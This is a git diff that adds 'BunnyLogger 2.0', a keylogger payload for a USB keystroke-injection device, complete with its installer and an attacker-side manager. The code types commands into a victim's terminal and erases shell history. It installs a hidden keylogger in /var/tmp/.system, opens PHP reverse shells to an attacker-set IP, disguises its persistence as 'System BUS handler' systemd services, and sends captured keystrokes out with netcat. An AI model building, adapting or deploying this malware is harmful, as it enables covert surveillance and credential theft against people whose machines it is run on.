diff --git a/payloads/library/credentials/BunnyLogger2.0/README.md b/payloads/library/credentials/BunnyLogger2.0/README.md new file mode 100644 index 000000000..1bb556ca5 --- /dev/null +++ b/payloads/library/credentials/BunnyLogger2.0/README.md @@ -0,0 +1,39 @@ +## About: +* Title: BunnyLogger 2.0 +* Description: Key logger which sends each and every key stroke of target remotely/locally. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Credentials +* Target: Unix-like operating systems with systemd. +* Attackmodes: HID, Storage + +## BunnyLogger 2.0: BunnyLogger is a Key Logger which captures every key stroke of target and send them to attacker. + +### Features: +* Live keystroke capturing. +* Stored Keystroke capturing. +* Bunny Logger Manager: Interactive TUI Dashboard. +* Detailed key logs. +* Persistent. +* Autostart payload on boot. + +### Directory Structure of payload components: + +| FileName | Directory | +| -------------- | ------------------------------ | +| payload.txt | /payload/switch1/ | +| payload.sh | /payload/ | +| requirements/* | /payloads/library/bunnyLogger2 | + +### LED Status: + +* `LED SETUP` : MAGENTA +* `LED ATTACK` : YELLOW +* `LED FINISH` : GREEN + +### Usage: +* Install BunnyLogger 2.0: `chmod +x install.sh && sudo ./install.sh` +* Run : `bunnyLoggerMgr` to launch BunnyLogger Manager. + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/credentials/BunnyLogger2.0/bunnyLoggerMgr b/payloads/library/credentials/BunnyLogger2.0/bunnyLoggerMgr new file mode 100644 index 000000000..3a88d66e3 --- /dev/null +++ b/payloads/library/credentials/BunnyLogger2.0/bunnyLoggerMgr @@ -0,0 +1,191 @@ +#!/bin/bash +allowAbort=true; +myInterruptHandler() +{ + if $allowAbort; then + echo + echo -e "\n\033[1;34m[INFO]: \e[0mYou terminated bunnyLoggerMgr..." && exit 1; + fi; +} +trap myInterruptHandler SIGINT +echo -e "\033[4m\033[1mWelcome to BunnyLogger Manager!!!\033[0m" +echo +echo -e "1] Fetch Keylogs.\n2] Create new target.\n3] List available target.\n4] Remove target.\n5] Update target.\n6] Decode Key Logs." +echo +read -p "Enter your choice: " ch +create(){ + read -p "Enter Target's name(without whitespaces): " name + if [[ $(grep -oh "\w*$name\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $name ]]; then + echo -e "\033[1;31m\e[1m[ERROR]: \e[0mName \"$name\" already exists." + exit 1 + fi + read -p "Enter Servers IP: " ip + read -p "Enter Unique Port Number(1500-65535): " port + read -p "Enter another Unique Port Number(1500-65535): " secPort + if [ "$port" == "$secPort" ]; then + echo -e "\033[1;34m[INFO]: \033[0mTwo ports can't be similar." + exit 1 + fi + if [[ $(grep -oh "\w*$ip\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $ip ]] && [[ $(grep -oh "\w*$port\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $port ]] && [[ $(grep -oh "\w*$secPort\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $secPort ]]; then + echo -e "\033[1;31m\e[1m[ERROR]: \e[0mTarget exist with similar IP address \"$ip\" and port number one \"$port\", port number two \"$secPort\"." + exit 1 + fi + max=65535 + min=1500 + if [[ $ip =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && (( $port <= $max )) && (( $port >= $min )) && (( $secPort <= $max )) && (( $secPort >= $min )); then + read -p "Specify directory for output: " dir + if [ ! -d "$dir" ]; then + echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory." + exit 1 + else + cp -r ~/.config/bunnyLogger/payload.sh $dir + fi + sed -i -e "s/0.0.0.0/$ip/g" $dir/payload.sh + sed -i -e "s/4444/$port/g" $dir/payload.sh + sed -i -e "s/5555/$secPort/g" $dir/payload.sh + echo -e "$(echo "$name"|xargs)\t$ip\t$port\t$secPort" >> ~/.config/bunnyLogger/bunnyLogger.db + else + echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid IP address \"$ip\" or Port Number \"$port\" or Port Number \"$secPort\"." + exit 1 + fi + +} +list(){ + + column -t -o ' ' ~/.config/bunnyLogger/bunnyLogger.db | awk '{print NR" - "$0}' +} +remove(){ + echo + list + echo + read -p "Enter name of target to remove: " rmv + if grep -q $rmv ~/.config/bunnyLogger/bunnyLogger.db; then + sed -i "/\b\($rmv\)\b/d" ~/.config/bunnyLogger/bunnyLogger.db + echo -e "\033[1;34m\e[1m[INFO]: \e[0m Successfully Removed \"$rmv\"." + else + echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$rmv\" no such target found." + fi +} +update(){ + echo + list + echo + read -p "Choose target number: " cho + read -p "You want to update (ip|portOne|portTwo): " ent + if [ "$ent" = ip ] + then + one=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}") + read -p "Enter new ip: " use + if [[ $use =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then + sed -i -e "$cho s/$one/$use/g" ~/.config/bunnyLogger/bunnyLogger.db + echo -e "\033[1;34m\e[1m[INFO]: \e[0mSuccessfully Updated IP." + else + echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid IP address \"$use\"." + exit + fi + elif [ "$ent" = portOne ] + then + two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 3}') + read -p "Enter new Port number: " useP + max=65535 + min=1500 + if (( $useP <= $max )) && (( $useP >= $min )); then + sed -i -e "$cho s/$two/$useP/g" ~/.config/bunnyLogger/bunnyLogger.db + echo -e "\033[1;34m\e[1m[INFO]: \e[0mUpdated Port number\"$ent\"." + else + echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Port Number \"$useP\"." + fi + elif [ "$ent" = portTwo ] + then + two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 4}') + read -p "Enter new Port number: " useP + max=65535 + min=1500 + if (( $useP <= $max )) && (( $useP >= $min )); then + sed -i -e "$cho s/$two/$useP/g" ~/.config/bunnyLogger/bunnyLogger.db + echo -e "\033[1;34m\e[1m[INFO]: \e[0mUpdated Port number\"$ent\"." + else + echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Port Number \"$useP\"." + fi + else + echo -e "\033[1;31m\e[1m[ERROR]: \e0m[Invalid choice \"$ent\"." + fi +} +fetch(){ + echo + list + echo + read -p "Enter Target number to connect: " cho + one=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}") + two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 3}') + three=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 4}') + echo -en "1] Live Capture \t2]Fetch Stored Logs: " + read typ + case $typ in + 1) + read -p "Specify directory for output: " dir + read -p "Enter filename to store logs: " filename + if [ ! -d "$dir" ]; then + echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory." + exit 1 + else + echo "\033[1;34m\e[1m[[INFO]: \e[0mStarted Keylogs Capture..." + nc -lvp $two > $dir/$filename.log + fi + ;; + 2) + read -p "Specify directory for output: " dir + read -p "Enter filename to store logs: " filename + if [ ! -d "$dir" ]; then + echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory." + exit 1 + else + nc -lvp 1444 > $dir/$filename.log & + nc -lvp $three + fi + ;; + *) + echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Choice.." + ;; + esac +} +decode(){ + echo -e "1] Normal Decode \t2] Informative Decode" + read -p "Enter your choice: " cho + read -p "Enter path of file to decode: " path + read -p "Enter path for decoded log: " out + case $cho in + 1) + awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $path | grep press | awk '{print $4}' > $out + ;; + 2) + awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $path > $out + ;; + *) + echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Choice \"$cho\"." + ;; + esac +} +case $ch in + 1) + fetch + ;; + 2) + create + ;; + 3) + list + ;; + 4) + update + ;; + 5) + remove + ;; + 6) + decode + ;; + *) + echo -e "\033[1;31m\e[1m[ERROR]: Invalid Choice \"$ch\"." + ;; +esac diff --git a/payloads/library/credentials/BunnyLogger2.0/install.sh b/payloads/library/credentials/BunnyLogger2.0/install.sh new file mode 100644 index 000000000..fba06e5da --- /dev/null +++ b/payloads/library/credentials/BunnyLogger2.0/install.sh @@ -0,0 +1,7 @@ +#!/bin/bash +path=~/.config/bunnyLogger +mkdir $path +cp payload.sh $path +touch $path/bunnyLogger.db +chmod +x bunnyLoggerMgr +sudo cp bunnyLoggerMgr /usr/local/bin/ diff --git a/payloads/library/credentials/BunnyLogger2.0/payload.sh b/payloads/library/credentials/BunnyLogger2.0/payload.sh new file mode 100644 index 000000000..16ae54df6 --- /dev/null +++ b/payloads/library/credentials/BunnyLogger2.0/payload.sh @@ -0,0 +1,28 @@ +#!/bin/bash +unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE +mkdir -p /var/tmp/.system/logs +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +cp -r $mntt/tools/xinput /var/tmp/.system/ +cp -r $mntt/payloads/library/bunnyLogger2/clctrl /var/tmp/.system/ +cp -r $mntt/payloads/library/bunnyLogger2/nc /var/tmp/.system/ +chmod +x /var/tmp/.system/nc +echo -e "name=\$(date +\"%y-%m-%d-%T\")\n/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test > /var/tmp/.system/logs/\$name.log &\n/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys +chmod +x /var/tmp/.system/sys +chmod +x /var/tmp/.system/clctrl +chmod +x /var/tmp/.system/xinput +echo -e "while :\ndo\n\tping -c 5 127.0.0.1\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"127.0.0.1\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone &\nwhile :\ndo\n\tping -c 5 127.0.0.1\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"127.0.0.1\",5555);exec("\"/var/tmp/.system/./clctrl "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus +chmod +x /var/tmp/.system/systemBus +mkdir -p ~/.config/systemd/user +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service +echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot +chmod +x /var/tmp/.system/reboot +echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service +systemctl --user daemon-reload +systemctl --user enable --now systemBUS.service +systemctl --user start --now systemBUS.service +systemctl --user enable --now reboot.service +systemctl --user start --now reboot.service +echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp +chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit diff --git a/payloads/library/credentials/BunnyLogger2.0/payload.txt b/payloads/library/credentials/BunnyLogger2.0/payload.txt new file mode 100644 index 000000000..f9c679692 --- /dev/null +++ b/payloads/library/credentials/BunnyLogger2.0/payload.txt @@ -0,0 +1,56 @@ +# Title: BunnyLogger +# Description: Key logger which sends each and every key stroke of target remotely/locally. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Credentials +# Target: Unix-like operating systems with systemd. +# Attackmodes: HID, Storage + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/payload.sh +Q ENTER +Q STRING /tmp/./payload.sh +Q ENTER +Q DELAY 2000 +Q STRING rm /tmp/payload.sh +Q ENTER +Q DELAY 500 + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/credentials/BunnyLogger2.0/requirements/clctrl b/payloads/library/credentials/BunnyLogger2.0/requirements/clctrl new file mode 100644 index 000000000..241ac449c --- /dev/null +++ b/payloads/library/credentials/BunnyLogger2.0/requirements/clctrl @@ -0,0 +1,41 @@ +#!/bin/bash +transfer(){ + echo -e "\033[1;34m[INFO]: Target Logs:\033[0m" + cd /var/tmp/.system/logs/ + ls /var/tmp/.system/logs/ | sort + echo + echo -n "Enter filename to transfer: " + read ch + if [ -f $ch ]; + then + echo -e "\033[1;34m[INFO]: Transferring file...\033[0m" + /var/tmp/.system/./nc -q 0 127.0.0.1 1444 < $ch >/dev/null 2>&1 + if [ $? -eq 0 ]; then + echo -e "\033[1;32m[SUCCESS]: File Transferred.\033[0m" + else + echo -e "\033[1;34m[INFO]: Netcat listner is not running on Attacking system.\033[0m\n\033[1;31m[ERROR]: File transfer failed.\033[0m" + fi + else + echo -e "\033[1;31m[ERROR]: Invalid Filename \"$ch\".\033[0m" + fi +} +conti(){ + while : + do + echo + echo -n "Would you like to transfer more files? [Y/N]: " + read ch + if [ "$ch" = y ] || [ "$ch" = Y ]; + then + transfer + elif [ "$ch" = N ] || [ "$ch" = n ]; + then + echo -e "\033[1;34m[INFO]: Terminating...\033[0m" + break + else + echo -e "\033[1;31m[ERROR]: Invalid Choice \"$ch\".\033[0m" + fi + done +} +transfer +conti diff --git a/payloads/library/credentials/BunnyLogger2.0/requirements/nc b/payloads/library/credentials/BunnyLogger2.0/requirements/nc new file mode 100644 index 000000000..8612bf0cd Binary files /dev/null and b/payloads/library/credentials/BunnyLogger2.0/requirements/nc differ diff --git a/payloads/library/credentials/BunnyLogger2.0/requirements/xinput b/payloads/library/credentials/BunnyLogger2.0/requirements/xinput new file mode 100644 index 000000000..b9a549880 Binary files /dev/null and b/payloads/library/credentials/BunnyLogger2.0/requirements/xinput differ diff --git a/payloads/library/credentials/BunnyLogger2.0/uninstall.sh b/payloads/library/credentials/BunnyLogger2.0/uninstall.sh new file mode 100644 index 000000000..e6059c360 --- /dev/null +++ b/payloads/library/credentials/BunnyLogger2.0/uninstall.sh @@ -0,0 +1,4 @@ +#!/bin/bash +path=~/.config/bunnyLogger +rm -rf $path +sudo rm /usr/local/bin/bunnyLoggerMgr